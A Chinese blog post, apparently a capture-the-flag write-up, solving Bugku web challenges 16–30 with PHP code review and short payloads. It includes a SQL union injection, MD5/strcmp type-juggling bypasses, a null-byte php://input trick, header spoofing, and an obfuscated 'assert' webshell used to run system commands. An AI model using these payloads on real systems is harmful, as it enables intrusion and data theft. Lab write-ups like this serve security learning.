Bugku_web16-30

最新推荐文章于 2024-05-11 02:11:37 发布
最新推荐文章于 2024-05-11 02:11:37 发布
阅读量228 收藏
点赞数
分类专栏: Bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45882317/article/details/112201980
版权

0x01 web16

  • 扫描得index.php.bak
  • 关键代码+我的注释如下
include_once "flag.php";
ini_set("display_errors", 0);//不报错
$str = strstr($_SERVER['REQUEST_URI'], '?');//从?开始截取URL
$str = substr($str,1);//剔除?
$str = str_replace('key','',$str);//替换key为空,双写绕过即可
parse_str($str);//把查询字符串解析到变量中,如name=Peter&age=43
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){//构造md5相同即可
    echo $flag."取得flag";
}

payload:?kekeyy1=240610708&kekeyy2=QNKCDZO

0x02 web17

直接联合注入
payload:' union select 1,2,3,skctf_flag from fl4g #

0x03 web18

import requests 
url ="http://114.67.246.176:14350/"
s = requests.Session()
req = s.get(url)
a = req.text[req.text.find('<div>')+5:req.text.find('=?')]
print(a)
aa = eval(a)
print (aa)
d = {'value':aa}
req = s.post(url,data=d)
print(req.text)

待整理

0x04 web19

跑脚本

import base64
import requests
url="http://114.67.246.176:16142/"
r=requests.session()
header=r.get(url).headers
b64dc=base64.b64decode(header['flag'])
flag=base64.b64decode(b64dc[-8:])
data={'margin':flag}
r=s.post(url,data=data)
print(r.text)

0x05 web20

  • 观察URL发现base64,解出keys.txt
  • 尝试index.php base64编码后接在URL上
  • 更改line的值,显示出代码
  • 跑脚本:
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';

}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
  • 在cookie中加margin=margin,filename=a2V5cy5waHA=,源代码查看即可

0x06 web21

  • 抓包后弹窗,发现重定向,删除重定向
  • 解码剩下的字符串,发现是base64,解得一段URL编码的的js
  • 解码得代码
if(!$_GET['id']) { //id!=0
header('Location: hello.php?id=1'); 
exit(); 
} 
$id=$_GET['id']; 
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.')) {//a中出现.则退出
 echo 'no no no no no no no'; 
 return ; 
 } 
$data = @file_get_contents($a,'r'); //php://input 再post上传bugku is a nice plateform!
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4) {
//id使用弱类型绕过
$flag = "flag{***********}" 
} 
else { print "never never never give up !!!"; } ?>

file_get_contents() 函数读取的值必须为数据流。因此这里用伪协议 php:// 来访问输入输出的数据流,其中 php://input可以访问原始请求数据中的只读流。

ereg() 函数或 eregi() 函数存在空字符截断漏洞,即参数中的正则表达式或待匹配字符串遇到空字符则截断丢弃后面的数据。
※源码中待匹配字符串(第二个参数)已确定为 “1114”,正则表达式(第一个参数)由 “111” 连接 $b 的第一个字符组成,若令 substr($b,0,1) = “%00”,即满足 “1114” 与 "111"匹配
注意:这里传参时要用%00【URL的00】

payload:

import requests
res = requests.get('http://114.67.246.176:12767/hello.php?id=0e1&a=php://input&b=%0012345', data='bugku is a nice plateform!') 
print(res.text)

0x07 web22

这道题没什么,就作者送过狗一句话
$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])

payload:http://114.67.246.176:14612/?s=system('cat flaga15808abee46a1d5.txt');

0x08 web23

<?php 
highlight_file('2.php');
$key='flag{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>
//trim移除字符串两侧的空白字符或其他预定义字符
  • 就传参,正则匹配成功就行

. 匹配除 “\n” 之外的任何单个字符
* 匹配它前面的表达式0次或多次,等价于{0,}
{4,7}最少匹配 4 次且最多匹配 7 次
[a-z] 匹配所有小写字母
[:punct:] 匹配任何标点符号

  • payload:
    id=keykeyaaaakey:/a/keya@

可见.的匹配与*的匹配不冲突
key.*key成功匹配keykey

0x09 web24

  • 源代码中找到code.txt
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){//md5绕过,简单
        if(!strcmp($v3, $flag)){//数组绕过
            echo $flag;
        }
    }
}
?>

payload:?v1=240610708&v2=QNKCDZO&v3[]=a

0x0A web25

参考博客
SQL约束攻击大致就是
①SQL在执行字符串处理的时候是会自动修剪掉尾部的空白符
②只能15位,输入了16位,数据库保存了15位,截取字符串绕过
payload:注册admin空格*n【后面n个空格】然后登录即可

0x0B web26

payload:Referer: https://www.google.com

0x0C web27

md5碰撞漏洞之0e
payload:?a=240610708

0x0D web28

请求头中加入
①X-Forwarded-For:127.0.0.1

②Client-ip: 127.0.0.1

0x0E web29

考察sha1遇数组返回false
payload:http://114.67.246.176:17602/?uname[]=1&id=margin post:passwd[]=2

0x0F web30

考察变量覆盖,观察其代码意思是ac的值等于名为fn的文件的文件内容
①题目提示是txt,尝试访问flag.txt得其内容,构造变量覆盖即可
payload:?ac=bugku&fn=flag.txt
②payload:?ac=x&fn=php://input post:x

建议使用burp来post,hackbar的post偶尔会抽风

ScyLamb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow_web入门_信息搜集
ScyLamb的博客
01-20 262
https://blog.csdn.net/qq_44893894/article/details/109380529 0x00 web1 payload:查看源代码 0x01 web2 <script type="text/javascript"> window.oncontextmenu = function(){return false}; window.onselectstart = function(){return false}; window.onkeydown = func
BUGKU--web详解
qq_49422880的博客
05-28 1939
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
2024年最全CTF BugKu平台—(Web篇①)_ctf bugku web(1),金三银四我带你去BAT面试现场
最新发布
2401_84281698的博客
05-11 666
白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!即num既不能是数字字符,但是要等于1,我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1因此。这里的sign显示是加密的。这里是zMNTA,这里我好几次都是zM开头的 ==结束的,查看源代码。弱密码top1000?是一个弹窗 F12 找到一些线索,估计是编码,看了一下下面的评论知道是Unicode编码。通过url传入what的值,让其等于flag,直接构造url就得到flag
【愚公系列】2023年06月 Bugku-Web(头等舱)
时光隧道
06-27 2690
Burp Suite是一款用于Web应用程序渗透测试的集成工具,它由PortSwigger Ltd.开发。Burp Suite包含了多个模块,可以进行代理、扫描、目录爆破、爬虫等操作。以下是Burp Suite的主要功能:代理:Burp Suite充当代理服务器,使用户可以拦截和修改在浏览器和Web服务器之间传输的数据。扫描:Burp Suite可以扫描Web应用程序中存在的各种漏洞情况(如SQL注入、XSS等)。目录爆破:Burp Suite可以自动化地枚举Web应用程序中隐藏的文件和目录。
bugku - Web
UP's blog
09-03 2020
刚刚入门CTF,如有错误,望大佬指教
BugKu:Web
qq_50034496的博客
07-30 1707
BugKu:Web
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
BWVS.rar_BWVS bugku_vulnerability
09-23
Bugku Web Vulnerability System
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
BUGKU--web
lulu001128的博客
04-17 111
解题过程
CTF BugKu平台———(Web篇②)
Aluxian_的博客
05-10 953
源代码: unescape编码:https://tool.chinaz.com/Tools/Escape.aspx PS:p1+’%35%34%61%61%32’ + p2 然后提交即可 67d709b2b54aa2aa648cf6e87a7114f1 文件包含: file=php://filter/read=convert.base64-encode/resource=index.php #构造pyload 好像需要密码: bp爆破密码:12468 备份是个好习惯: ...
网络安全行业需要学历吗?需要考研吗?(1)
2401_84239830的博客
04-27 304
👉👈​。
BUGKU-WEB 文件包含
天泽岁月
02-22 1314
BUGKU-WEB 文件包含,PHP伪协议
BUGKU-WEB
wojiushilsy的博客
02-22 486
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
Bugku_web_从零开始(一)
weixin_43727482的博客
01-13 279
Bugku_web_从零开始 从零开始; 000 web2:听说聪明的人都能找到答案 右键检查元素得到flag; 001 计算器 输入计算结果的时候发现只能输入一个数字,右键审查元素,改一下input标签长度;输入正确结果得到flag; 002 web基础$_GET 审查代码可知使用get方法传参使得 $what=='flag';get方法可直接在url上构造“http://123.206...
Bugku_web(一)
weixin_44087538的博客
03-26 432
根据您之前提到的代码片段,当$num被赋值为'1abc'时,is_numeric($num)会返回true,因为'1abc'包含一个有效的数字开头。需要注意的是,POST请求没有长度限制,因此可以传输大量数据,但也需要注意数据的编码和格式,以确保服务器能够正确解析和处理。在解题过程中,保持冷静和专注,不断尝试和学习,你会逐渐提高自己的解题能力。,最终都是index.php,如果文件夹下没有index页,就会列出当前目录下所有文件,这个就比较危险了,当然,可以通过服务器设置权限,避免被人看到你的网站结构。
BugkuCTF web16_备份是个好习惯 writeup
Mitchell_Donovan的博客
01-10 410
web16_备份是个好习惯 原题链接 key:备份文件访问+php绕过 ①场景打开后啥也没有,只有一串神秘代码(MD5加密后的字符串,大佬说的) 根据题目提示,应该是有备份文件存在的,所以用御剑扫描一下吧 成功发现备份文件index.php.bak ②在地址栏后加上/index.php.bak,把备份文件下载到本地 打开备份文件后,发现这是php代码 进行代码审计和资料搜集,给代码加上注释 <?php /** * Created by PhpStorm. * U..
bugku flask_fileupload
06-06
Bugku Flask FileUpload是一个用于在Flask Web应用程序中处理文件上传的库。它支持多种文件上传解决方案,包括本地文件系统、Amazon S3、Google Cloud Storage等。非常感谢您的提问。如果我理解正确的话,您想知道...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值